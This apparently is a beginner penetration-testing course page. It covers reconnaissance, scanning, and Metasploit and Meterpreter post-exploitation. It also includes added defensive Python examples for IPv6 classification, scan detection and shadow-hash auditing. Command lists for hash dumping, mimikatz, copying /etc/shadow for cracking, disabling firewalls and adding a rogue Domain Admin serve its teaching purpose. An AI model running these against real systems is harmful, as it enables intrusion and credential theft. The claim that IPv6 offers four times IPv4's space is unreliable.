Our one-day program is designed for beginners and covers the fundamentals of cybersecurity. We start with the basics of common computer and network services and end with exploitation and an understanding of attack methodologies and strategies to defend against them. We will also focus on ways to build a home lab along with challenges and educational references to improve your skillset.

This course is for you if you are interested in a cybersecurity career but don't have much hands-on experience yet.

Who Should Attend

Anyone with a desire to learn offensive attack techniques and how to defend against methods employed by attackers to break into systems.  We foster a fun, collaborative and open environment where trial and error is embraced, failures are utilized as learning tools, and creative thinking is encouraged!

For those with little or no experience, this is a great first step in your cybersecurity career!

Agenda

  • Home Lab Setup
  • Passive Information Gathering
  • Windows Active Directory
  • IPv6 Overview
  • Wireshark Fundamentals
  • Active Information Gathering
  • Vulnerability Identification & Analysis
  • Common Services, Threats & Attacks
  • Exploitation
  • Post Exploitation
  • The Metasploit Framework
  • Capture the Flag

Windows Active Directory

Powered by a domain controller and using the Kerberos service (port 88), Windows Active Directory serves as the management system for authentication and authorization of Windows-based operating systems.

With a domain controller, you can control just about any aspect of a client machine. In order to do so, a user will need to have an account on the domain they are logging into. Once authenticated the domain controller "pushes" all of the associated software, rules, and privileges to the device.

Keep in mind that there can be multiple domains and/or subdomains as well as multiple domain controllers. Also, users can have different privileges in different domains (for example, an administrator in one domain can be a low-level user in another). As a network administrator, you have the ability to control all aspects of your domain.

Here are some helpful resources to help you get started:

Passive Information Gathering

In cyber we are always hunting for information. There are two main types of information collection processes, active and passive. Let's start with the passive collection, which just means that we're going to use tools and methods that will (hopefully) not alert anyone to our presence.

Google

We all know how powerful Google is, but we may not be totally sure of what Google can do. For example, you can use double quotes to be more specific in your searches. Offensive Security maintains an entire database called the Google Hacking Database (GHDB) that can help you identify things like footholds, files containing usernames, sensitive directories, and vulnerable files and servers. The database, which is updated regularly, will provide you the exact syntax to use to identify these vulnerabilities.

Google also has a "Google Trends" site that allows you to see what the world has been searching for. Some additional references include:

The OSINT Framework

The Open Source Intelligence (OSINT) Framework is a collection of tools that help improve your intelligence gathering process. The site will provide useful links to whatever you may be searching for.

IntelTechniques

People often put lots of unnecessary personal information on Social Media accounts. It is recommended to create “dummy” accounts and use these accounts to perform reconnaissance. Use as many different social media platforms as necessary to gather as much information as you can.

Shodan

Everything connected to the internet can be detected by Shodan.

Way Back Machine

The Wayback Machine allows you to view previous versions of websites. This is great for passive reconnaissance since it lets you see an earlier version of the site.

Robtex

Robtex is the go-to for network infrastructure enumeration. You can use this tool to identify domains, subdomains, A records, AAAA records, MX records, IP addresses and more.

HaveIBeenPwned

Have I Been Pwned? allows you to search across multiple data breaches to see if a customer's or your own email addresses were compromised.


foller.me

Foller.me is a Twitter application that allows for statistical analysis of public Twitter profiles. You can


whois

The whois command allows you to identify registration information for a particular domain or IP address.

  • # whois espn.com
  • # whois 8.8.8.8

theHarvester

Pre-installed on Kali, theHarvester lets you query search engines for email addresses.

  • Kali Tools - theharvester
  • # theharvester -d [targetdomain.com] -l 500 -b yahoo
  • # theharvester -d [targetdomain.com] -l 500 -b google
  • # theharvester -d [targetdomain.com] -l 500 -b linkedin
  • # theharvester -d [targetdomain.com] -l 1000 -b all

Discover

The Discover tool by Lee Baird comes highly recommended. It is great for passive or active reconnaissance on a domain or person.

  • Github - leebaird / discover
  • # git clone https://github.com/leebaird/discover.git /opt/discover
  • # cd /opt/discover
  • # ./update.sh
  • # ./discover.sh

Common Services, Threats & Attacks

The easiest approach to finding a way into a machine or network is to examine the common services that most systems use because there are usually well-known ways to attack those services. Let’s look at some basic services and tactics for attacking a system.

Some common services you should be familiar with are:

IPv6 Overview

All TCP/IP networks require an IP address for each device on the network. The version we have used since the beginning of the Internet is known as an IPv4 address. In this section we're going to look at the "next generation" address protocol called IPv6, how it differs from IPv4, and why it's become so important as the Internet continues to grow.

Think of every road, street, highway, or path you've ever been on, and now imagine there is another road, street, highway, or path directly underneath it that not too many people know about. Now imagine that there are another 300+ undecillion of those roads, streets, highways, and paths. That is IPv6 in a nutshell.

IPv6 was created because of the shortage of available IPv4 addresses. With an additional 96 bits, it is 4 times the IP space of IPv4. These additional addresses are available because IPv6 addressing uses hexadecimal characters.

IPv6 has been around since 1994 and it has been enabled by default on all Windows operating systems since Windows Vista. It is like having another door on your home that you see occasionally but never open. Well, that door would still lead inside your home. Now imagine that door being an address on your computer or mobile device.

Yes, next time you are at the command prompt type ipconfig or ifconfig to see your current IP address. Most likely, you will see an IPv6 address with the prefix of FE80. That address will allow the same capabilities as the more common IPv4 address.

IPv4 and IPv6 are two separate protocols. It's like having the ability to speak two different languages. These protocols DO NOT communicate with each other without some type of translation or tunneling mechanism. Currently there are over 30 different types of tunneling with Microsoft's Teredo Tunneling being the most popular.

IPv6 Fun Facts:

  • There are more IPv6 Addresses than there are grains of sand in the world
  • Facebook's IPv6 address for their website contains face:b00c
    • 2a03:2880:f103:83:face:b00c:0:25de
  • # host www.facebook.com
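
To see these address types for yourself, here is a short Python script (an added example, not part of the course material) that pulls the IPv6 addresses out of ipconfig/ifconfig-style output and labels each one as link-local, multicast, unique local, or global. The output it reads is constructed for the example; point it at your own ipconfig or ifconfig output to check whether IPv6 is active on your machine.

```python
# Added example (not from the course material): pick out the IPv6 addresses in
# ipconfig/ifconfig output and say what kind each one is. The sample output below
# is constructed for this example, not captured from a real machine.
import ipaddress

SAMPLE_OUTPUT = """\
Ethernet adapter Ethernet0:
   Link-local IPv6 Address . . . . . : fe80::1c2d:3e4f:5a6b:7c8d%12
   IPv6 Address. . . . . . . . . . . : 2a03:2880:f103:83:face:b00c:0:25de
   IPv4 Address. . . . . . . . . . . : 10.0.6.187
   Default Gateway . . . . . . . . . : 10.0.6.1
"""


def extract_ipv6(text):
    """Return every token that parses as an IPv6 address, in order of appearance."""
    found = []
    for token in text.split():
        # Windows appends a zone index ("%12") to link-local addresses; drop it.
        candidate = token.split("%", 1)[0]
        try:
            addr = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # labels, dots, IPv4 addresses and so on
        if addr.version == 6:
            found.append(addr)
    return found


def classify(addr):
    """Describe what an IPv6 address can reach. Order matters: fe80::/10 also
    counts as 'private' in the ipaddress module, so link-local is tested first."""
    if addr.is_loopback:
        return "loopback (::1)"
    if addr.is_multicast:
        return "multicast (ff02::1 is the all-nodes group on the local link)"
    if addr.is_link_local:
        return "link-local (fe80::/10): auto-configured, reachable on the local segment only"
    if addr.is_private:
        return "unique local (fc00::/7): routable inside the site, not on the Internet"
    if addr.is_global:
        return "global unicast: routable on the Internet"
    return "other/reserved"


def report(text):
    """Map each IPv6 address in the output to (fully expanded form, classification)."""
    return {str(a): (a.exploded, classify(a)) for a in extract_ipv6(text)}


def ipv6_enabled(text):
    """An interface has IPv6 active as soon as it holds a link-local address,
    which is the fe80 address the course says you will usually see."""
    return any(a.is_link_local for a in extract_ipv6(text))


if __name__ == "__main__":
    for addr, (exploded, kind) in report(SAMPLE_OUTPUT).items():
        print(f"{addr:40} {exploded}\n    {kind}")
    print("IPv6 enabled on this interface:", ipv6_enabled(SAMPLE_OUTPUT))
```

The expanded form makes the 128-bit structure visible (eight groups of four hex digits), and the classification is what matters to a defender: a link-local address is reachable by anything on the same segment even when nobody configured IPv6 on purpose.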

Wireshark Fundamentals

One of our primary tools for passive/active information gathering is a program called a packet analyzer or packet sniffer. Packet analyzers can take a file of captured data (known as a pcap file) and examine it in various ways to tell us more about the traffic between different machines on a network. The most popular packet analyzer is Wireshark, so let's take a look at how it works and how to use it.

Wireshark is a tool every security professional should be comfortable with. At a minimum, you should understand capture filters, display filters, profiles, and how to filter for different services as well as identifying IPv6 traffic. Our workshop is an introduction to network conversation statistics, threat hunting, and carving documents from .pcap files.

Capture filters allow you to capture only specific types of traffic. This prevents the capture of packets you don't need, so you don't waste valuable processing power and hard drive space.

To capture traffic from a specific host:

  • host 10.0.6.187

To capture traffic from a range of IPs:

  • net 10.0.6.0/24
  • net 10.0.6.0 mask 255.255.255.0

To capture traffic from only the source or destination range:

  • src net 10.0.6.0/24
  • src net 10.0.6.0 mask 255.255.255.0
  • dst net 10.0.6.0/24
  • dst net 10.0.6.0 mask 255.255.255.0

To capture traffic from a specific port or range of ports:

  • port 23
  • portrange 1-1024
  • tcp portrange 1-1024
  • udp port 167
  • udp portrange 1-1000

To capture traffic from a specific URL or host:

  • host www.cover6solutions.com

To exclude a specific type of traffic:

  • not port 23
  • not arp

To capture various types of IPv6 traffic:

  • ip6
  • dst host ff02::1
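
The following Python script is an added example (not from the course) that mimics how the capture filters above select packets: it evaluates the host, net (with /prefix or mask), src/dst, port, portrange, not, ip6 and arp forms shown above against a handful of constructed packet summaries. It accepts literal addresses only; tcpdump resolves hostnames such as www.cover6solutions.com when it compiles the filter.

```python
# Added example (not from the course material): a tiny evaluator for the subset of
# Wireshark/tcpdump capture-filter syntax used in these notes, applied to constructed
# packet metadata so you can see exactly which packets each filter keeps. Real capture
# filters are compiled to BPF and run in the kernel; this only mimics their matching rules.
import ipaddress
from collections import namedtuple

# Constructed packet summaries (not a real capture). src/dst are None for ARP.
Packet = namedtuple("Packet", "proto src dst sport dport")
PACKETS = [
    Packet("tcp", "10.0.6.187", "93.184.216.34", 51234, 80),   # web request leaving the LAN
    Packet("udp", "10.0.6.212", "10.0.6.1", 50000, 167),        # UDP to port 167
    Packet("tcp", "10.0.7.5", "10.0.6.187", 4444, 23),          # telnet from another subnet
    Packet("icmpv6", "fe80::1", "ff02::1", None, None),         # IPv6 all-nodes multicast
    Packet("arp", None, None, None, None),                      # ARP request
]


def _addr_match(pkt, direction, predicate):
    """Apply predicate to the packet's src, dst, or both, depending on the qualifier."""
    candidates = []
    if direction in (None, "src") and pkt.src:
        candidates.append(pkt.src)
    if direction in (None, "dst") and pkt.dst:
        candidates.append(pkt.dst)
    return any(predicate(ipaddress.ip_address(a)) for a in candidates)


def _port_match(pkt, direction, lo, hi):
    if pkt.proto not in ("tcp", "udp"):
        return False  # 'port' only means something for TCP/UDP
    candidates = []
    if direction in (None, "src"):
        candidates.append(pkt.sport)
    if direction in (None, "dst"):
        candidates.append(pkt.dport)
    return any(lo <= p <= hi for p in candidates)


def matches(expr, pkt):
    """Evaluate one primitive, optionally negated: [not] [tcp|udp] [src|dst] <test>."""
    tokens = expr.lower().split()
    negate = tokens[0] == "not"
    if negate:
        tokens = tokens[1:]
    proto = tokens.pop(0) if tokens[0] in ("tcp", "udp") else None
    direction = tokens.pop(0) if tokens[0] in ("src", "dst") else None
    keyword = tokens[0]
    if keyword == "ip6":
        result = pkt.src is not None and ipaddress.ip_address(pkt.src).version == 6
    elif keyword == "arp":
        result = pkt.proto == "arp"
    elif keyword == "host":
        target = ipaddress.ip_address(tokens[1])  # literal addresses only (assumption)
        result = _addr_match(pkt, direction, lambda a: a == target)
    elif keyword == "net":
        # Both "net 10.0.6.0/24" and "net 10.0.6.0 mask 255.255.255.0" are accepted.
        spec = f"{tokens[1]}/{tokens[3]}" if len(tokens) > 3 and tokens[2] == "mask" else tokens[1]
        network = ipaddress.ip_network(spec, strict=False)
        result = _addr_match(pkt, direction, lambda a: a in network)
    elif keyword in ("port", "portrange"):
        if keyword == "port":
            lo = hi = int(tokens[1])
        else:
            lo, hi = (int(p) for p in tokens[1].split("-"))
        result = (proto is None or pkt.proto == proto) and _port_match(pkt, direction, lo, hi)
    else:
        raise ValueError(f"unsupported filter: {expr}")
    return result != negate


def apply_filter(expr, packets=PACKETS):
    """Return the indexes of the packets a capture filter would keep."""
    return [i for i, pkt in enumerate(packets) if matches(expr, pkt)]


if __name__ == "__main__":
    for expr in ("host 10.0.6.187", "src net 10.0.6.0/24", "udp port 167",
                 "not arp", "ip6", "dst host ff02::1"):
        print(f"{expr:24} keeps packets {apply_filter(expr)}")
```

Notice that "net 10.0.6.0/24" keeps the telnet packet because its destination is inside the range while "src net 10.0.6.0/24" drops it; that is the difference the src/dst qualifiers make when you are trying to capture only what a particular host sends.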

Once you have started capturing traffic, you can still fine-tune what you see by using a display filter.

To display traffic from a specific IP address:

  • ip.addr == 10.0.6.187

To display traffic from a specific source or destination IP address:

  • ip.src == 10.0.6.187
  • ip.dst == 10.0.6.187

To display source and destination traffic between two specific IP addresses:

  • ip.addr == 10.0.6.101 && ip.addr == 10.0.6.187

To display traffic from multiple IP addresses:

  • ip.addr == 10.0.6.187 or ip.addr == 10.0.6.212

To display a specific type of traffic:

  • http
  • telnet
  • ipv6

Active Information Gathering

Once we have exhausted the possible ways to passively collect information about our target, we will turn to active collection. These tools and methods are more powerful and can provide us with more information, but at the same time, they may expose you to detection. Let's have a look at some common techniques.

Wireshark

Wireshark is the best tool available for analyzing network traffic; it is highly recommended that everyone become very familiar with its usage.

Nmap

Nmap is a network mapper primarily used to identify the existence of network hosts or devices, ports, services and vulnerabilities. It is the tool of choice for network enumeration and will most likely be the first tool to get detected by network defense devices.

An ideal enumeration process is:

  • Host Identification
  • Port Identification
  • Service Identification
  • Vulnerability Identification
  • Exploitation

Yes, you can perform these tasks separately or with one command. The point is to keep your network footprint small while staying accountable for your traffic. Some commands to perform these tasks are:

  • nmap -sn 10.0.6.200-254
  • nmap -v -T4 -sS -Pn --top-ports 10 10.0.6.200-254 --open
  • nmap -v -T4 -sT -Pn --top-ports 10 10.0.6.200-254 --open
  • nmap -v -T4 -sV -Pn --top-ports 25 10.0.6.200-254 --open
  • nmap -v -T4 -sV -sC -Pn -F 10.0.6.200-254 --open
  • nmap -v -T4 -A -p- 10.0.6.200-254 --open --randomize-hosts
  • nmap -v -T4 -p 445 --script=smb-vuln-ms10-061 10.0.6.200-254 --open
  • nmap -v -T4 -sU -sT -sV -p U:53,11,137,161,T:22,139,445 10.0.6.200-254 --open
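
From the defender's side, the scans above leave an unmistakable pattern in firewall or flow logs: one source touching many hosts and many ports within seconds. The Python script below is an added example (not course material) that parses constructed log lines in a made-up format and flags such sources with a sliding window. The log format, the thresholds and the sample traffic are all assumptions to adapt to your own environment.

```python
# Added example (not from the course material): spot the traffic pattern the nmap
# commands in these notes produce, from the firewall's point of view. The log format
# and every line are constructed for this example; adapt LOG_RE to your own logs.
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed format: one line per connection attempt the firewall saw.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) PROTO=(?P<proto>\w+) DPT=(?P<dpt>\d+)$"
)


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "proto": m["proto"], "dpt": int(m["dpt"])}


def build_sample_log():
    """Constructed log: a little normal traffic plus one host sweeping 10.0.6.200-254
    on ten ports, the shape that `nmap -sS --top-ports 10 10.0.6.200-254` produces."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = [f"{(base + timedelta(seconds=s)).isoformat()} SRC=10.0.6.187 DST=10.0.6.218 PROTO=TCP DPT=445"
             for s in (1, 2, 3)]                       # a workstation using a file share
    lines.append(f"{(base + timedelta(seconds=5)).isoformat()} SRC=10.0.6.101 DST=10.0.6.1 PROTO=UDP DPT=53")
    top_ports = [21, 22, 23, 25, 80, 110, 139, 443, 445, 3389]   # ten common TCP ports
    n = 0
    for last_octet in range(200, 255):
        for port in top_ports:
            ts = base + timedelta(milliseconds=30 * n)   # 550 SYNs in about 16 seconds
            n += 1
            lines.append(f"{ts.isoformat()} SRC=10.0.6.250 DST=10.0.6.{last_octet} PROTO=TCP DPT={port}")
    return lines


def detect_scans(lines, window_seconds=60, host_threshold=10, target_threshold=15):
    """Flag sources that touch many distinct hosts or host:port pairs inside a sliding window.
    A ping sweep (-sn) trips the host threshold; --top-ports or -p- trip the target
    threshold; --randomize-hosts changes the order of events but not these counts."""
    by_src = defaultdict(list)
    for line in lines:
        event = parse_line(line)
        if event:
            by_src[event["src"]].append(event)
    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        hosts, targets = Counter(), Counter()
        peak_hosts = peak_targets = left = 0
        for event in events:
            hosts[event["dst"]] += 1
            targets[(event["dst"], event["dpt"])] += 1
            # Evict events that fell out of the window so the counts stay per-window.
            while (event["ts"] - events[left]["ts"]).total_seconds() > window_seconds:
                old = events[left]
                for counter, key in ((hosts, old["dst"]), (targets, (old["dst"], old["dpt"]))):
                    counter[key] -= 1
                    if counter[key] == 0:
                        del counter[key]
                left += 1
            peak_hosts = max(peak_hosts, len(hosts))
            peak_targets = max(peak_targets, len(targets))
        if peak_hosts >= host_threshold or peak_targets >= target_threshold:
            alerts[src] = {"hosts": peak_hosts, "targets": peak_targets}
    return alerts


if __name__ == "__main__":
    for src, peak in detect_scans(build_sample_log()).items():
        print(f"possible scan from {src}: {peak['hosts']} hosts, "
              f"{peak['targets']} host:port pairs within 60 s")
```

The two normal hosts never exceed one destination, while the scanner reaches 55 hosts and 550 host:port pairs inside a single window. Slowing the scan down (-T1 instead of -T4) is the usual way such a detector is evaded, which is why the window length is the setting to tune.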

Scanning with Metasploit

Although scanning with nmap is very popular, you can also use Metasploit auxiliary modules to perform scans. Below are some examples:

  • 21 auxiliary/scanner/ftp/anonymous
  • 21 auxiliary/scanner/ftp/ftp_version
  • 22 auxiliary/scanner/ssh/ssh_version
  • 23 auxiliary/scanner/telnet/telnet_version
  • 25 auxiliary/scanner/smtp/smtp_version
  • 69 auxiliary/scanner/tftp/tftpbrute
  • 79 auxiliary/scanner/finger/finger_users
  • 80 auxiliary/scanner/http/http_version
  • 110 auxiliary/scanner/pop3/pop3_version
  • 111 auxiliary/scanner/misc/sunrpc_portmapper
  • 123 auxiliary/scanner/ntp/ntp_monlist
  • 143 auxiliary/scanner/imap/imap_version
  • 512 auxiliary/scanner/rservices/rexec_login
  • 513 auxiliary/scanner/rservices/rlogin_login
  • 514 auxiliary/scanner/rservices/rsh_login
  • 1521 auxiliary/scanner/oracle/sid_enum
  • 3306 auxiliary/scanner/mysql/mysql_version
  • 5432 auxiliary/scanner/postgres/postgres_version
  • 5900 auxiliary/scanner/vnc/vnc_none_auth
  • 6000 auxiliary/scanner/x11/open_x11
  • 9100 auxiliary/scanner/printer/printer_version_info
  • 50000 auxiliary/scanner/db2/db2_version

nbtscan

A command-line scan tool, running on Windows or Linux, which displays NetBIOS information. It may even display logged in users and device purpose. This is helpful when building your initial hosts and users list.

  • # nbtscan 10.0.6.200-254
  • # nbtscan -v 10.0.6.200-254
  • C:> nbtscan 10.0.6.0/24

smbtree

  • # smbtree -b
  • # smbtree -D
  • # smbtree -S

enum4linux

enum4linux gives a multitude of information from a target machine: usernames, password policies, user and group information, etc. It also shows what commands were used to get that information. This does not work all the time. An example would be:

  • # enum4linux 10.0.6.218

host

The host command can be used in many different ways to identify information for a particular host or website. This is a good way to begin DNS and/or network infrastructure enumeration.

  • # host www.facebook.com

facebook.com has address 173.252.110.27
facebook.com has IPv6 address 2a03:2880:2110:df07:face:b00c:0:1
facebook.com mail is handled by 10 msgin.t.facebook.com.

An example of a successful search for ipv6.google.com is the following:

  • # host ipv6.google.com

ipv6.google.com is an alias for ipv6.l.google.com.
ipv6.l.google.com has IPv6 address 2607:f8b0:4004:801::1004

To identify mail servers using the host command:

  • # host -mx cover6solutions.com

Nameserver identification

  • # host -t ns cover6solutions.com

dnsrecon

Dnsrecon is one of many tools you can use to attempt a zone transfer in hopes of enumerating a domain's DNS records.

  • # dnsrecon -d megacorpone.com -t axfr

dnsenum

Probably the easiest way to perform a zone transfer in Kali is to use the dnsenum tool. Keep in mind that most sites should not allow zone transfers!

  • # dnsenum megacorpone.com

fierce

Another easy way to attempt a zone transfer in Kali is the fierce command. Most sites should not allow zone transfers! The zone file will contain a list of all the DNS names configured in that zone, which is basically the corporate network layout.

  • # fierce -dns cover6solutions.com

IPv6 Enumeration

IPv6 has been out for over 21 years. It is a protocol or method of communication just like IPv4 but with about 300+ undecillion more available IP addresses. Think of it as if for every road, highway, or path that exists there is another one directly under it that not many people know about. Now add 300+ undecillion more!

Please be very careful with these IPv6 tools. Spend some time researching and practicing more from the atk6 toolset.

atk6-alive6

Alive6 is a tool you can use to identify IPv6 hosts on the local network segment:

  • # atk6-alive6 -l eth0

Vulnerability Identification & Analysis

Once you have collected information about your target, you'll want to start thinking about how to use that information in your attack strategy. This is called vulnerability analysis and we'll see that there are many resources to help you discover how to compromise a system.

Vulnerability testing is the process of discovering flaws in systems and applications which can be leveraged by an attacker. These flaws can range from host and service misconfiguration to insecure application design. Although the process used to look for flaws varies and is highly dependent on the particular component being tested, some key principles apply to the process.

Nmap

Nmap, or Network Mapper, is a free, open-source tool that allows for network discovery and security auditing. It can be installed on any operating system. Nmap can also be used to identify vulnerabilities by using the Nmap Scripting Engine (NSE). In Kali Linux, the NSE scripts can be found in /usr/share/nmap/scripts.

Before you use any specific scripts, you should use the -sC switch to have nmap run its default scripts against a target. Here is an example:

  • root@kali:~# nmap -v -T4 -sC -sV -p- 10.0.6.216 --open

To run a specific script from the scripts directory, make sure you specify the correct port/service for that script. Here's an example:

  • root@kali:~# nmap -v -T4 -p 21 --script ftp-vsftpd-backdoor 10.0.6.216

Nikto

Nikto is an open-source web scanner that runs more than 6700 checks for potentially dangerous files and programs and for outdated server versions. It is quick and easy to use and can net you results very quickly. You can use the -help option to see all of the available options, but here is the quickest way to perform a web application vulnerability scan using Nikto.

  • root@kali:~# nikto -h 10.0.6.216

OpenVAS

OpenVAS is one of the more popular vulnerability scanning tools. It is free and easily configurable in Kali Linux. Here are the commands to get OpenVAS up and running:

  • root@kali:~# apt-get update
  • root@kali:~# apt-get dist-upgrade
  • root@kali:~# apt-get install openvas
  • root@kali:~# openvas-setup
  • root@kali:~# openvas-start

Give it some time to start; after a few minutes you should be able to log in at https://127.0.0.1:9392.

Often you may forget to take note of the password for the admin account. If this happens, you can type the following to set a new admin password.

  • root@kali:~# openvasmd --user=admin --new-password=letmein

Nessus

Nessus is the go-to tool for Enterprise vulnerability scans. Nessus is free (Nessus Home) for the first 16 IP addresses. However, you will need to fill out a quick form (First Name, Last Name, and Email Address) to receive a free license. From a price standpoint, you can purchase a one-year Nessus Pro license for $2,190. There is also a free option to try the Pro version for 7 days.

Exploitation

If you can read to it (see it), and write to it (make changes), then you can exploit it.

Post Exploitation

Host Enumeration

Assuming you have a Meterpreter shell on a Windows host, you can use the following commands:

  • meterpreter > getsystem
  • meterpreter > getuid
  • meterpreter > run winenum
  • meterpreter > sysinfo
  • meterpreter > ipconfig
  • meterpreter > run get_local_subnet
  • meterpreter > enumdesktops
  • meterpreter > webcam_list
  • meterpreter > run post/windows/gather/smart_hashdump
  • meterpreter > run post/windows/gather/enum_applications
  • meterpreter > run post/windows/gather/enum_logged_on_users
  • meterpreter > run post/windows/gather/enum_shares
  • meterpreter > run post/windows/gather/checkvm
  • meterpreter > background

Upon exploitation of a Linux host, the screen may be blank but from here you can input your standard Linux post exploitation commands.

Firewalls

  • C:> netsh advfirewall show rule name=all
  • C:> netsh advfirewall set allprofile state off
  • C:> netsh advfirewall set allprofile state on

Domain Enumeration

The following commands, with the proper privileges, allow for Windows domain enumeration.

  • C:> net users
  • C:> net user <USER NAME> /domain
  • C:> net user <USER NAME> <NEW PASSWORD>
  • C:> net users /domain
  • C:> net groups /domain
  • C:> net groups “Domain Admins” /domain

Adding a user to the Domain

Upon successfully enumerating the system/network and acquiring domain administrator privileges it is now time to add the user Cover6 with the password Cover6#C6S to the network/domain. The command to do this from a Windows host is:

  • C:\WINDOWS\system32> net user Cover6 Cover6#C6S /ADD /DOMAIN
  • C:> net user Cover6 Cover6#C6S /ADD /DOMAIN

Adding a user to the Domain Admins group

Upon successfully adding the user Cover6 to the domain, it is now time to add the user to the Domain Admins group. The command to do this from a Windows host is:

  • C:\WINDOWS\system32> net group “Domain Admins” Cover6 /ADD /DOMAIN
  • C:> net group “Domain Admins” Cover6 /ADD /DOMAIN

The Metasploit Framework

Privilege Escalation Techniques

Once you're inside a system, one of the first actions you'll want to take is privilege escalation. Ideally, you want control of the system, so figuring out how to turn your user-level account into an admin account will be a priority. Let's take a look at some of the ways to accomplish this.

Upon exploitation of a target, for the most part, you will obtain the same privileges as the exploited user. Often times you may need to escalate your privileges to become an Administrator.

Windows Privilege Escalation

Sometimes the payload will automatically attempt to get SYSTEM privileges. If this is successful then dumping password hashes is pretty easy. If not, you may need to try additional techniques. One such technique for stand-alone Windows systems is obtaining the password hashes stored in the %systemroot%\system32\config\SAM file. This file is normally locked while Windows is running, but it is worth a try.

On domain controllers, password hashes are kept in the Active Directory %windir%WindowsDSntds.dit

Below are some quick and dirty ways to escalate privileges on a Windows host:

  • meterpreter > use priv
  • meterpreter > getsystem

If getsystem is unsuccessful you may need to point additional escalation modules at the session of the previously compromised system. Here are some options:

  • run post/windows/escalate/getsystem
  • run post/windows/escalate/droplnk
  • use exploit/windows/local/ask
  • use exploit/windows/local/bypassuac
  • use exploit/windows/local/trusted_service_path
  • use exploit/windows/local/ppr_flatten_rec
  • use exploit/windows/local/service_permissions
  • Fuzzy Security 2.0 - Windows Privilege Escalation Fundamentals - http://www.fuzzysecurity.com/tutorials/16.html

Mimikatz

Mimikatz may allow you to obtain clear text passwords from memory.

  • meterpreter > load mimikatz
  • meterpreter > kerberos

Incognito

Incognito allows for impersonation of user tokens.

  • meterpreter > use incognito
  • meterpreter > list_tokens -u
  • meterpreter > impersonate_token [Domain][User]
  • meterpreter > getuid
  • meterpreter > list_tokens -g

Linux Privilege Escalation

Probably the easiest way to escalate privileges on a Linux host is to use what we learned during the Exploitation phase: search searchsploit or exploit-db.com for a privilege escalation exploit. Once we identify one, we download and compile the exploit, test it on a similar system, then try it on our target.

Password Attacks

Moving around a compromised system would be a lot easier if you had the right passwords! You may find you need a password to get into a directory or access a file or change system settings, etc. But how do you discover and crack them? In this section, we'll discuss several different ways to attack passwords.

Windows Passwords

To run a hashdump post exploitation type:

  • meterpreter > run post/windows/gather/smart_hashdump

You can use an auxiliary module to crack the hashes you've gained within the database.

  • meterpreter > use auxiliary/analyze/jtr_crack_fast
  • meterpreter > run
  • meterpreter > creds

Linux Passwords

You can use john, a tool built into Kali, to crack Linux password files (/etc/passwd and /etc/shadow). Keep in mind that these files may be inaccessible, so privilege escalation may be required first.

  • # cat /etc/passwd > 218-passwd
  • # cat /etc/shadow > 218-shadow
  • # unshadow /etc/passwd /etc/shadow > 218-unshadow
  • # john 218-unshadow
  • # john --show 218-unshadow

A simpler option is to point john directly at the shadow file:

  • # john /etc/shadow
  • # john 218-shadow

Note: You can also have John crack hashes using a word list. See the example below.

  • # john --wordlist=/usr/share/wordlists/rockyou.txt 218-unshadow
  • # john --wordlist=/usr/share/wordlists/rockyou.txt /etc/shadow
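
To see what unshadow actually produces, and what a defender checks in the same fields, here is an added Python example (not part of the course). It merges a constructed /etc/passwd and /etc/shadow pair the way unshadow does, then flags accounts whose password field is empty or uses a legacy hash type that john gets through quickly. The hash strings in the sample are placeholders, not real hashes.

```python
# Added example (not from the course material): what `unshadow` does when it merges
# /etc/passwd with /etc/shadow, plus the audit a defender runs over the same fields.
# Both files below are constructed; the hash strings are placeholders, not real hashes.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
legacy:x:1002:1002:Legacy service:/srv/legacy:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$constructedsalt$constructedsha512hash:19500:0:99999:7:::
daemon:*:19500:0:99999:7:::
alice:$y$j9T$constructedsalt$constructedyescrypthash:19500:0:99999:7:::
bob::19500:0:99999:7:::
legacy:$1$abcdefgh$constructedmd5hash:19500:0:99999:7:::
"""


def parse_colon_file(text):
    """Return {username: [fields...]} for a passwd- or shadow-style file."""
    records = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            records[fields[0]] = fields
    return records


def unshadow(passwd_text, shadow_text):
    """Rebuild the classic single-file layout: the 'x' in passwd field 2 is
    replaced by the hash from shadow field 2. This is the file john expects."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for name, fields in parse_colon_file(passwd_text).items():
        if name in shadow:
            fields = fields[:1] + [shadow[name][1]] + fields[2:]
        merged.append(":".join(fields))
    return merged


def hash_type(field):
    """Classify a shadow password field by its crypt prefix."""
    if field == "":
        return "empty"          # no password required at all
    if field[0] in "!*":
        return "locked"         # password login disabled
    prefixes = {"$6$": "sha512crypt", "$5$": "sha256crypt", "$y$": "yescrypt",
                "$1$": "md5crypt", "$2": "bcrypt"}
    for prefix, name in prefixes.items():
        if field.startswith(prefix):
            return name
    return "descrypt" if "$" not in field else "unknown"


# Empty fields need no cracking at all; md5crypt and the old DES crypt are fast to crack.
WEAK = {"empty", "md5crypt", "descrypt"}


def audit_shadow(shadow_text):
    """Return {username: hash_type} for every account whose password field is
    empty or uses a legacy algorithm."""
    return {name: hash_type(fields[1])
            for name, fields in parse_colon_file(shadow_text).items()
            if hash_type(fields[1]) in WEAK}


if __name__ == "__main__":
    print("\n".join(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)))
    print("accounts to fix:", audit_shadow(SAMPLE_SHADOW))
```

On a real system the same audit is a one-liner over /etc/shadow as root; anything it reports (an empty field, or a $1$ or 13-character DES hash) is what john will recover first, so those are the accounts to reset or lock before an attacker runs the commands above.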

Antivirus & Firewall Evasion

Most of the systems in the real world that you will encounter will not be open and defenseless, and at a minimum, they will probably have antivirus/antimalware programs and firewalls installed specifically to keep you out! Are there ways around these defenses? In fact, there are and we'll learn about some of the most effective techniques for bypassing them.

Pivoting

